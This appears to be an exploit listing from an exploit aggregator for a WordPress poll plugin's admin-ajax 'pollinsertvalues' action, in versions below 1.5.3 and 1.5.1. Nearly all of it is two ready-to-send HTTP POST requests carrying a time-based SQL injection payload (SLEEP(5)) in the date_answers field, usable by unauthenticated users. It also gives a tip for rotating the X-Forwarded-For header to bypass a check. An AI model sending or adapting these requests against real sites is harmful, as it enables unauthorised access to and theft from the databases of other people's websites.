Share
## https://sploitus.com/exploit?id=WPEX-ID:7376666E-9B2A-4239-B11F-8544435B444A
v < 1.5.3

POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
X-Forwarded-For: Yolo [this value needs to be different each time, can be anything, no validation is done]
Cookie: [any user, authenticated or not]
Connection: close

question_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)

v < 1.5.1

POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
Cookie: [any user, authenticated or not]
Connection: close

question_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)